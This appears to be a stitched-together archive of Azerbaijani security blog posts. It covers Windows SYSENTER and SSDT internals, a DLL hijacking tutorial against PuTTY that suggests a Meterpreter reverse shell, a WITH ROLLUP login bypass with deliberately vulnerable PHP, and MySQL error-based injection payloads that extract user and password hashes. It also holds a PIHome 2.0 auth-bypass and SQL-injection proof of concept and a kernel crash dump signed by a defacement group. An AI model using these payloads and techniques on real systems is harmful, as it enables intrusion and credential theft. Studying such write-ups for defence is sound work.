0xFFF – kernel mode SYSCALL

Hal hazırda yazdığım kernelin üzərində işləyirəm… Demək normal halda OS üzərində System call mexanizmini NT Kernel tərzində SSDT – SSDTS bənzəri etdim birinci fikirləşdim ki, standart IRQ (interrupt request) göndərərək –  Trap handler vasitəsi ilə (int 0x2e) birbaşa KiSystemService dispatcher çağırmaq ancaq sonra qərarımdan döndüm çünki SYSENTER/SYSEXIT instruction-larından istifadə etməyə qərar verdim və maraqlanmağa başladım.

SYSENTER/SYSEXIT Interrupt çoxluqundan qaçınmaq üçün hazırlanmış Syscall based instruction-dır.

NT architecture native api istifadə zamanı Zw və Nt prefixlərindən istifadə edir. Windows OS privilige level yoxlanılması üçün previous mode istifadə edir. Belə ki, previous mode dəyəri (user or kernel) hər dəfə trap handling icra edildiyində kernel `thread` içində  bunu saxlayır və daxil olan exception,trap,syscall imtiyaz səviyyəsini yoxlayır. Əgər system call kernel driver tərəfindən gəlirsə `probing` və `capturing` prosessləri ötülür. Həmçinin bu native APİ üçün interrupt və yaxud sysenter ehtiyyac yoxdur çünki CPU artıq doğru privilige level-dədir. NTDLL modulu tərəfindən NT və Zw prefixləri altında funksiyalar export edilir. Yalnız əgər birbaşa NtCreateFile (Native APİ) kernel mode address çağrılarsa previous mode bu əməliyyatı sonlandırar.

User mode application-lar NTDLL.LIB ilə `link` edildikdə System servis dispatcher vasitəsi ilə Kernel mode (context switching – mode transition) keçid edilir. Ümumiyyətlə NT kernel `System servic call stub` üçün ayrıca instruction `hardcode` əvəzinə bunu shared strukturada saxlayır (KUSER_SHARED_DATA).

_KUSER_SHARED_DATA+(0x300) offsetində yerləşir System servis çağırıcısı

0:001> dt ntdll!_KUSER_SHARED_DATA

+0x000 TickCountLowDeprecated : Uint4B

+0x004 TickCountMultiplier : Uint4B

+0x008 InterruptTime    : _KSYSTEM_TIME

[…]

+0x300 SystemCall       : Uint4B <========

+0x304 SystemCallReturn : Uint4B

+0x308 SystemCallPad    : [3] Uint8B

[…]

WINDOWS Əməliyyat sistemi üzərində bu Structure (_KUSER_SHARED_DATA) statik adrese sahibdir = 0x7FFE0000.

0: kd> u ntdll!NtReadFile

ntdll!NtReadFile:

77f761e8 b8b7000000       mov     eax,0xb7

77f761ed ba0003fe7f       mov     edx,0x7ffe0300 <=====

77f761f2 ffd2             call    edx

77f761f4 c22400           ret     0x24

lkd> u poi(0x7ffe0300)

ntdll!KiFastSystemCall:

770b64f0 8bd4            mov     edx,esp

770b64f2 0f34            sysenter <========

ntdll!KiFastSystemCallRet:

770b64f4 c3              ret

770b64f5 8da42400000000  lea     esp,[esp]

770b64fc 8d642400        lea     esp,[esp]

ntdll!KiIntSystemCall:

770b6500 8d542408        lea     edx,[esp+8]

770b6504 cd2e            int     2Eh

770b6506 c3              ret

Win7 üzərində system call dispatcher olaraq sysenter istifadə edildiyini gördük.

sysenter instruction-dan danışım: CPL = 0 (privilige level 0) olan system prosedurlarını və rutinlərini sürətli çağırışını təmin edir. Bu instruction CPL = 0 (privilige level 0) üzərində olan əməliyyat sistemi və yaxud icrad edici prosedurların CPL = 3 (privilige level 3) üzərində çalışdırmaq üçün maksimum performans təşkil edir.

SYSENTER instruction icra edilmədən öncə, proqram təminatı privilige level 0 (CPL 0) code segment və code entry point təyin etməlidir, və privilige level 0 stack segment və stack pointer təyin etmək gərəktir.

intel ref:

•IA32_SYSENTER_CS — Contains a 32-bit value, of which the lower 16 bits are the segment selector for the privilege level 0 code segment. This value is also used to compute the segment selector of the privilege level 0 stack segment.

•IA32_SYSENTER_EIP — Contains the 32-bit offset into the privilege level 0 code segment to the first instruction of the selected operating procedure or routine.

•IA32_SYSENTER_ESP — Contains the 32-bit stack pointer for the privilege level 0 stack.These MSRs can be read from and written to using RDMSR/WRMSR. Register addresses are listed in Table 4-17. The addresses are defined to remain fixed for future Intel 64 and IA-32 processors.

[öz hazırladıqım kernel üzərində İVT 0x2e qeyd etmişim vector onu ləğv edərək `MSR` register daxilində dispatcher funksiya adresini qeyd etdim.]

İnterrupt və yaxud Exception generasiya edildiyində, (context switching) prosessor maşının cari vəziyyətini kernel steki üzərində saxlayır ki, interrupt icra edildikdən sonra proqram axışı cari nöqtəyə qayıdaraq icra davam etsin. Əgər thread istifadəçi modunda çalışırsa, OS threadi kernel moda keçirtmək istərsə. O zaman OS kernel stekdə trap frame yaradaraq onun üzərinə cari thread vəziyyətini (thread state) qeyd edir.

lkd> dt nt!_ktrap_frame

+0x000 DbgEbp           : Uint4B

+0x004 DbgEip           : Uint4B

+0x008 DbgArgMark       : Uint4B

+0x00c DbgArgPointer    : Uint4B

+0x010 TempSegCs        : Uint2B

+0x012 Logging          : UChar

+0x013 Reserved         : UChar

+0x014 TempEsp          : Uint4B

+0x018 Dr0              : Uint4B

+0x01c Dr1              : Uint4B

+0x020 Dr2              : Uint4B

+0x024 Dr3              : Uint4B

+0x028 Dr6              : Uint4B

+0x02c Dr7              : Uint4B

+0x030 SegGs            : Uint4B

+0x034 SegEs            : Uint4B

+0x038 SegDs            : Uint4B

+0x03c Edx              : Uint4B

+0x040 Ecx              : Uint4B

+0x044 Eax              : Uint4B

+0x048 PreviousPreviousMode : Uint4B

+0x04c ExceptionList    : Ptr32 _EXCEPTION_REGISTRATION_RECORD

+0x050 SegFs            : Uint4B

+0x054 Edi              : Uint4B

+0x058 Esi              : Uint4B

+0x05c Ebx              : Uint4B

+0x060 Ebp              : Uint4B

+0x064 ErrCode          : Uint4B

+0x068 Eip              : Uint4B

+0x06c SegCs            : Uint4B

+0x070 EFlags           : Uint4B

+0x074 HardwareEsp      : Uint4B

+0x078 HardwareSegSs    : Uint4B

+0x07c V86Es            : Uint4B

+0x080 V86Ds            : Uint4B

+0x084 V86Fs            : Uint4B

+0x088 V86Gs            : Uint4B

KiFastCallEntry iki əməliyyatı yerinə yetirir.

1. trap frame yaradaraq user moda döndükdə lazım olacaq bütün informasiyaları saxlayır.

2. `System service descriptor table` üzərində  sistem servis funksiyasını taparaq çağırır.
`MSR` (model-specific register) register-nə baxaq

IA32_SYSENTER_EIP (0x176) – The kernel’s EIP for SYSENTER. This is the address of your SYSENTER entry point.
0: kd> rdmsr 176msr[176] = 00000000`8053a270

0: kd> ln 8053a270

(8053a270)   nt!KiFastCallEntry   |  (8053a2fb)   nt!KiSystemService

 

nt!KiFastCallEntry:

b923000000      mov     ecx,23h

6a30            push    30h

0fa1            pop     fs

8ed9            mov     ds,cx

8ec1            mov     es,cx

648b0d40000000  mov     ecx,dword ptr fs:[40h]

8b6104          mov     esp,dword ptr [ecx+4]

6a23            push    23h

52              push    edx

9c              pushfd

6a02            push    2

83c208          add     edx,8

9d              popfd

804c240102      or      byte ptr [esp+1],2

6a1b            push    1Bh

ff350403dfff    push    dword ptr ds:[0FFDF0304h]

6a00            push    0

55              push    ebp

53              push    ebx

56              push    esi

57              push    edi

648b1d1c000000  mov     ebx,dword ptr fs:[1Ch]

6a3b            push    3Bh

8bb324010000    mov     esi,dword ptr [ebx+124h]

ff33            push    dword ptr [ebx]

c703ffffffff    mov     dword ptr [ebx],0FFFFFFFFh

8b6e28          mov     ebp,dword ptr [esi+28h]

6a01            push    1

83ec48          sub     esp,48h

81ed9c020000    sub     ebp,29Ch

c6863a01000001  mov     byte ptr [esi+13Ah],1

3bec            cmp     ebp,esp

7597            jne     nt!KiFastCallEntry2+0x49 (82e7a2fb)

 

Kitay dostlarımdan super məlumat taparaq ingiliscəyə tərcümə etmişəm Azərbaycan dilində tərcümə çox çətin olduğundan.

 // When a thread executes in kernel mode data segment selector is 23h

// When a thread executes in kernel mode, loaded in the FS register is to select the sub-30,

// Structure for addressing PCR 804de6f0 mov ecx, 23h

804de6f5 push 30h

804de6f7 pop fs

 // 23h-> ds; 23h-> es

804de6f9 mov ds, cx

804de6fb mov es, cx

 // Dword ptr fs: [40h] == dword ptr ds: [0FFDFF040h] {TSS}

// Dword ptr [ecx + 4] for the current thread’s kernel-mode stack pointer value 804de6fd mov ecx, dword ptr ds: [0FFDFF040h]

804de703 mov esp, dword ptr [ecx + 4]

 // ==========================================

// The current (the value of the registers before execution Sysenter) pushed onto the system stack context,

 // _KTRAP_FRAME.HardwareSegSs

804de706 push 23h

 // _KTRAP_FRAME.HardwareEsp

804de708 push edx

 // _KTRAP_FRAME.EFags

804de709 pushfd

804de70a push 2

804de70c add edx, 8

 // EFlags = 2

804de70f popfd

804de710 or byte ptr [esp + 1], 2

 // _KTRAP_FRAME.SegCs

804de715 push 1Bh

 // Ds: [0FFDF0304h] is SystemCallReturn (_KUser_Shared_Data)

// _KTRAP_FRAME.Eip

804de717 push dword ptr ds: [0FFDF0304h]

 //_KTRAP_FRAME.ErrorCode

804de71d push 0

 //_KTRAP_FRAME.Ebp

804de71f push ebp

 //_KTRAP_FRAME.Ebx

804de720 push ebx

 //_KTRAP_FRAME.Esi

804de721 push esi

 //_KTRAP_FRAME.Edi

804de722 push edi

//ebx<-_KPCR.SelfPcr804de723 mov ebx, dword ptr ds: [0FFDFF01Ch]

 // _KTRAP_FRAME.SegFs

804de729 push 3Bh

 //esi=_KPCR.PrcbData.CurrentThread

804de72b mov esi, dword ptr [ebx + 124h]

 //_KTRAP_FRAME.ExceptionList

804de731 push dword ptr [ebx]

// Initialization list 804de733 mov dword ptr [ebx], 0FFFFFFFFh

 // Ebp = KPCR.PrcbData.CurrentThread. InitialStack

804de739 mov ebp, dword ptr [esi + 18h]

 //_KTRAP_FRAME.PreviousPreviousMode = 1

804de73c push 1

 // Esp -> _ KTRAP_FRAME

804de73e sub esp, 48h

 // Ebp -> _ KTRAP_FRAME

804de741 sub ebp, 29Ch

 // CurrentThread +124 = 1

804de747 mov byte ptr [esi + 140h], 1

 // Compare 804de74e cmp ebp, esp

// Not equal, the occurrence of abnormal 804de750 jne nt! KiFastCallEntry2 + 0x24 (804de6c8)

 // _KTRAP_FRAME.Dr7 = 0

804de756 and dword ptr [ebp + 2Ch], 0

 // [Esi + 2Ch] is KTHREAD.DebugActive current thread // debug flag is not equal to 0xFF indicates debugging?

804de75a test byte ptr [esi + 2Ch], 0FFh

804de75e mov dword ptr [esi + 134h], ebp

804de764 jne nt! Dr_FastCallDrSave (804de5b0)

// Ebx = _KTRAP_FRAME.Ebp804de76a mov ebx, dword ptr [ebp + 60h]

 // Edi = _KTRAP_FRAME.EIP

804de76d mov edi, dword ptr [ebp + 68h]

 // _KTRAP_FRAME.DbgArgPointer

804de770 mov dword ptr [ebp + 0Ch], edx

 // _KTRAP_FRAME.DbgArgPointer = DbgArgMark

804de773 mov dword ptr [ebp + 8], 0BADB0D00h

 //_KTRAP_FRAME.DbgEbp

804de77a mov dword ptr [ebp], ebx

 //_KTRAP_FRAME.DbgEip = _KTRAP_FRAME.EIP

804de77d mov dword ptr [ebp + 4], edi

// ==================================

Doğru System Descriptor Table tapmaq üçün KiFastCallEntry daxilində bəzi hesablama əməliyyatları aparılır.

mov ecx,23h

mov ds,cx //load the new ds

mov ebx,dword ptr ds:[0FFDFF01Ch] //EBX=KPCR.SelfPcr, ie, KPCR itself

mov esi,dword ptr [ebx+124h] //ESI=KTHREAD

mov edi,eax //EDI=system service number

shr edi,8

mov     ecx, edi ; ecx now has the actual index for the SSDT

and edi,30h //EDI=SSDT index

add edi,dword ptr [esi+0E0h] //EDI=SSDT

mov edi,dword ptr [edi] //EDI=SSDT->ServiceTableBase

mov ebx,dword ptr [edi+eax*4] //EBX=service function address

Kernel Process Control BLOCK teqdim ediremmm

typedef struct _KPCR

{

union

{

NT_TIB NtTib;

struct

{

PEXCEPTION_REGISTRATION_RECORD Used_ExceptionList;

PVOID Used_StackBase;

PVOID Spare2;

PVOID TssCopy;

ULONG ContextSwitches;

ULONG SetMemberCopy;

PVOID Used_Self;

};

};

PKPCR SelfPcr;

PKPRCB Prcb;

UCHAR Irql;

ULONG IRR;

ULONG IrrActive;

ULONG IDR;

PVOID KdVersionBlock;

PKIDTENTRY IDT;

PKGDTENTRY GDT;

PKTSS TSS;

WORD MajorVersion;

WORD MinorVersion;

ULONG SetMember;

ULONG StallScaleFactor;

UCHAR SpareUnused;

UCHAR Number;

UCHAR Spare0;

UCHAR SecondLevelCacheAssociativity;

ULONG VdmAlert;

ULONG KernelReserved[14];

ULONG SecondLevelCacheSize;

ULONG HalReserved[16];

ULONG InterruptMode;

UCHAR Spare1;

ULONG KernelReserved2[17];

KPRCB PrcbData;

} KPCR, *PKPCR;

on  = typedef struct _KTHREAD

PVOID ServiceTable;
e.g

mov eax,0x102

102 – ci sistem servis nömrəsinə məxsus funksiya = NtReadFile

         lkd> ln poi(KiServiceTable + 102 * 4)

(82193023)   nt!NtReadFile

32 bit register üzərindəki (eax) sistem servis nömrəsi bu parçalardan ibarətdir:

bit 0-11: sistem servis nömrəsi çağırış üçün

bit 12-13: service descriptor table üçün istifadə edilir

bit 13-31: istifadə edilmir

Keçək dəfə mövzuda bəhs etmişdim Win iki System Descriptor Table istifadə etdiyindən.

KeServiceDescriptorTableShadow

——————————

KeServiceDescriptorTable

sistem servis nömrələrdindən 0x0-0xFFF aralıqında bütün nömrələr KeServiceDescriptorTable indexləri  olaraq istifadə edilir.

0x1000-0x1FFF aralıqları isə KeServiceDescriptorTableShadow indexləri olaraq istifadə edilir.

SSN(SYSTEM SERVİCE NUMBER) – SSDT (System Descriptor Table)

eax = 0x100F

mov edi,eax //EDI=system service number

shr edi,8 // edi>>0x8 = 10h = shifting rulezzz

and 0x10,0x30 = (0x10)d = (10000)b & (110000)b = (10000)b = (0x10)d

nt!KiFastCallEntry+0xaf:82e7a3af 83f910          cmp     ecx,10h

82e7a3b2 751a            jne     nt!KiFastCallEntry+0xce (82e7a3ce)

Burada check edir SSDT table yoxsa Shadow Table olduqunu.

ecx = 10 olarsa Shadow Table qeyd edilir əks halda SSDT regular table.

 

 

Advertisements

DLL Hijacking təməlləri

Dll Hijack texnikası

 

Salam dostlar. Bu gün sizə məşhur texnikalardan biri olan Dll Hijack-dan danışmaq istəyirəm. Mövzuya girməmişdən əvvəl gəlin anlayaq nədir bu DLL?

DLL- Dynamic Linking library (Dinamik birləşdirilən kitabxana) Windows  ƏS-də kodun paylaşılması üçün istifadə olunur. Bu da kodun daha modular olmasına kömək edir. Executable fayl .dll faylını LoadLibrary() funksiyası ilə load edir və GetProcAddress() ilə DLL içindəki lazimi funksiyanın adresini taparaq çağırır. DLL-in ümumi strukturu aşağıdakı şəkildə göstərilib:

1-dll-structure

Biz DLL hijack üçün aşağıdakı kodu istifadə edəcəyik. Kod exploit-db.com saytından example kimi götürülüb. ( https://www.exploit-db.com/exploits/14789/ )

2-dll-code

Əvvəla anlayaq görək EXE fayl bu dll faylları hardan axtarmağa çalışır? MSDN baxsaq orda bu ardıcıllıq göstərilib ( http://msdn.microsoft.com/en-us/library/windows/desktop/ms682586(v=vs.85).aspx ) :

3-search

Şəkildə  göründüyü kimi DLL-lər əvvəl App yüklənən qovluqda sonra da cari qovluqda axtarılmağa başdıyır. Hə nə olsun? Deyim bilin. Əgər biz App-in yükləmək istəyibdə yükləyə bilmədiyi DLLi öz zərərli DLL-imizlə dəyişsək və ya axtardığı DLL pathı bizim qoyduğumuz DLL pathından aşağıda olsa o zaman GAME OVER olacaq. Nə dediyimi biraz sonra anlayacaqsız 🙂

Əgər SafeDllSearchMode aktiv edilibsə o zaman ardıcıllıq dəyişir:

4-search2

Şəkildən göründüyü kimi cari qovluğun axtarılma sırası ən aşağılardadı. Bu funksionallıq DLL hijack yayğın olmağa başlayanda ortaya Hijack prosesinin qabağını almaq üçün çıxarmışdılar. Müəyyən səviyədə qabağını alsa da bu həmişə alır demək deyil 🙂

DLL hijack texnikasını bu dəfə məşhur SSH clienti olan PuttY üzərində yoxlayacayıq. (Qeyd: PuttY nin bütün versiyaları vulnerable-di).

Bizə Sysinternals Suite lazım olacaq. Daha doğrusu həmin suitdə  olan ProcMon. Procmonu açırıq və ardıyca PuTTY.exe açırıq. Daha sonra filter tətbiq edərək bizə lazım olanları saxlayırıq:

5-procmon_filter

Bizə əsas Nəticəsi “NAME NOT FOUND” olanları tapmaqdı. Hansı ki biz həmin DLL-ləri öz zərərli DLL-lərimizlə dəyişəcəyik.

6-procmon_2

 

Burada necə deyərlər “Trail and Error”  yanaşması ilə gedəcəyik. Mümkün bütün halları yoxlayıb harda daha yaxşı nəticə alınır yoxlayacayıq.

Məsələn elə DWMAPI.DLL götürək. Bayaq sizə verdiyim source kodu DLL kimi kompliyasiya edin və adını dwmapi.dll qoyaraq PuTTY.exe ilə eyni qovluğa atın. Daha sonra əgər PuTTY.exe girsəz Dll hijack olunduğunu görərsiz 🙂

7-hijacked3

 

Bunun nəticəsi çox ağır ola bilər . Məsələn Metasploitin Meterpreterini .dll kimi buna vursaq reverse shell almış olacıyıq )) və Game Over olacaq))

Bu DLL hijackingin dinamik analizi ilə tapılması idi. Bəzən İDA istifadə etməklə statik şəkildə tapmaq

məcburiyətində qalırıq. Gələn səfərki yazıda DLL hijack ilə Privilege Escalation dan danışacayıq.

//Hayat bazen cok Ajda Pekkan

HardCore episode 2. WITH ROLLUP modifier trick

Column Data Truncate injection mövzusunu yazanda verilmiş authentication hissəndə sql injection olduğunu və ondan başqa bir mövzuda yazı yazacağımı demişdim.Bu gün auth injection bypass metodunu fərqli bir texnika üzərindən realizə edəcəyik

Group by şərtində WITH ROLLUP modifikatoru hər hansı bir sorğunun outputunda ekstra sətir yaranmasını təmin edir.

http://dev.mysql.com/doc/refman/5.0/en/group-by-modifiers.html

Qeyd üçün deyim ki,bəzi payloadlar da burada keçərlidir məs.(admin’ or ‘1’=’1– və.s)

<?php

mysql_connect('localhost','root','xxxxxxxxx');
mysql_select_db('yourowndb');

if($_POST){

$username = strip_tags($_POST['login']);
$password = strip_tags(md5($_POST['pass']));

$query = mysql_query("select * from users where login='$username' and pass='$password'");

if(mysql_num_rows($query)>0){

echo 'Admin panel<br>';
while($row = mysql_fetch_array($query)){

echo "ID: ".$row['id'];
}
}else{
echo 'istifadeci adi ve ya sifre yanlisdir';
}

}

?>
<center>
<form method="post">
<label>Username: </label><input type="text" name="login"> </br></br>
<label>Password: </label><input type="password" name="pass"> </br></br>
<input type="submit" value="Daxil ol"> </br>
</form>

</center>

mysql> select * from users where login='admin' group by pass with rollup;
+----+-------+----------------------------------+
| id | login | pass |
+----+-------+----------------------------------+
| 1 | admin | 0cc175b9c0f1b6a831c399e269772661 |
| 1 | admin | NULL |
+----+-------+----------------------------------+
2 rows in set (0.00 sec)

Burada group by dan sonra gələn column -u `pass` dan dərhal sonra with rollup yazdıqda yaranmış ekstra sətirdə pass columnuna NULL təyin edir və şifrə boş ötürüldüyündən şərt təmin olunur.

MySQL Alternative error-based vectors


Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 202
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select!x-~0.FROM(select+user()x)f;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'


mysql> select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308;
ERROR 1690 (22003): DOUBLE value is out of range in '(if((select ('root' or 'localhost' or '*xxxxFBxxxxxxxxxxxxxE0AAE75B7517260' or 'Y') from dual limit 1),2,2) * 1E308)'

//BIGINT overflow 

mysql> select (x!=0x00)--9223372036854775808 from(SELECT version()x)y;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5.44-0ubuntu0.14.04.1' 0x00) - -(9223372036854775808))'

//BIGINT overflow 

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5.44-0ubuntu0.14.04.1' from dual),18446744073709551610,18446744073709551610))'

sleep delay

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not(sleep(1))) - ~(0))'
mysql> select!xsleep(11)-~0.from admin;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not(sleep(11))) - ~(0))'

RaspberryPi PIHome 2.0 Sql injection

Vendor : http://pihome.harkemedia.de/
Web based application demo : https://www.youtube.com/watch?v=dADgi6LqIMQ
Github: https://github.com/cerosx/RPI.PIHome2.0-GUI-Frontend

1)Auth bypass PoC with or statement : ‘ or ‘1’=’1 —
2)Recursive fuzzing in ajax method second PoC

http://localhost/index.php?c=home&a=set&id=1%27+order+by+1111--_on

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; 

Snippet from source code :

public function updateaktivAction()
 { 
    if($_GET['id']!=""){
      require_once 'models/homeModel.php';
      $model = new homeModel();
      echo $model->updateDeviceAktiv($_GET['id'], $_GET['set']);
    }
 }

Linux kernel < 3.5 *Null Pointer Dereference*

Null pointer dereference -_-
affected version: < 3.5 linux kernel

4R!F,CAMOUFL4G3,EMINGH @Azdefacers


`bu nömrəyə zəng çatmır telefon ya söndürülüb yada əhatə dairəsi xaricindədir xahiş edirik biraz sonra zəng edəsiniz`

[ 2674.778679] Pid: 715, comm: ebana-qaşqaldağ Not tainted 3.5.0-18-generic
[ 2674.779165] EIP: 0060:[<f837f3d5>] EFLAGS: 00010286 CPU: 0
[ 2674.779673] EIP is at 0xf837f3d5+0x215/*** [******]
[ 2674.779977] EAX: f6088cc0 EBX: f63a7e14 ECX: f6088cd8 EDX: 00000000
[ 2674.780284] ESI: 00000000 EDI: f63a6000 EBP: f63a7d20 ESP: f63a7c84
[ 2674.780634] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[ 2674.780957] Process ebana-qaşqaldağ (pid: 715, ti=f63a6000 task=f58b58d0 task.ti=f63a6000)
[ 2674.781380] Stack:
[ 2674.781849] f63a7cf8 00000080 f635e000 f63a7cec 00000008 f635e000 00000080 f63a7cf4
[ 2674.782996] <0> 00000080 00000000 f63a7ccc f63a7e14 f63a7f1c 00092cd8 f6263600 00000000
[ 2674.784357] <0> f63a6000 00000088 f63a7c90 c02193b6 00000002 00000000 00000000 f63a7cec


[ 2674.773316] BUG: unable to handle kernel NULL pointer dereference at 00000008
[ 2674.800483] EIP: [<f837f3d5>] 0xf837f3d5+0x215/*** [*****] SS:ESP 0068:f63a7c84

root@ubuntu:~# gdb -c /proc/kcore 
[New <main task>]
Core was generated by `BOOT_IMAGE=/boot/vmlinuz-2.6.35-22-generic root=UUID=2165eadf-1277-4482-98e0-5fb'.
#0 0x00000000 in ?? ()

 0xf837f3d5: mov edx,DWORD PTR [esi+0x8] <======= null pointer dereference
 0xf837f3d8: mov DWORD PTR [ecx+0x18],0x4e2
 0xf837f3df: mov DWORD PTR [ecx+0xc],edx
 0xf837f3e2: mov edx,DWORD PTR ds:0xc07c5a40
 0xf837f3e8: mov DWORD PTR [ecx+0x1c],edx
 0xf837f3eb: mov edx,DWORD PTR ds:0xf8380cc4
 0xf837f3f1: mov DWORD PTR [ebp-0x30],edx
 0xf837f3f4: mov DWORD PTR [ecx+0x14],edx
 0xf837f3f7: add edx,0x1
 0xf837f3fa: mov DWORD PTR ds:0xf8380cc4,edx
 0xf837f400: mov edx,DWORD PTR [esi]
 0xf837f402: mov DWORD PTR [eax+0x18],edx
 0xf837f405: mov edx,DWORD PTR [esi+0x4]
 0xf837f408: mov DWORD PTR [ecx+0x4],edx
 0xf837f40b: mov edx,DWORD PTR [esi+0x8]
 0xf837f40e: mov DWORD PTR [ecx+0x8],edx
 0xf837f411: mov edx,eax
 0xf837f413: mov eax,0xf8380cc8
 0xf837f418: call 0xc04ec3c0
 0xf837f41d: mov edi,DWORD PTR [ebp-0x54]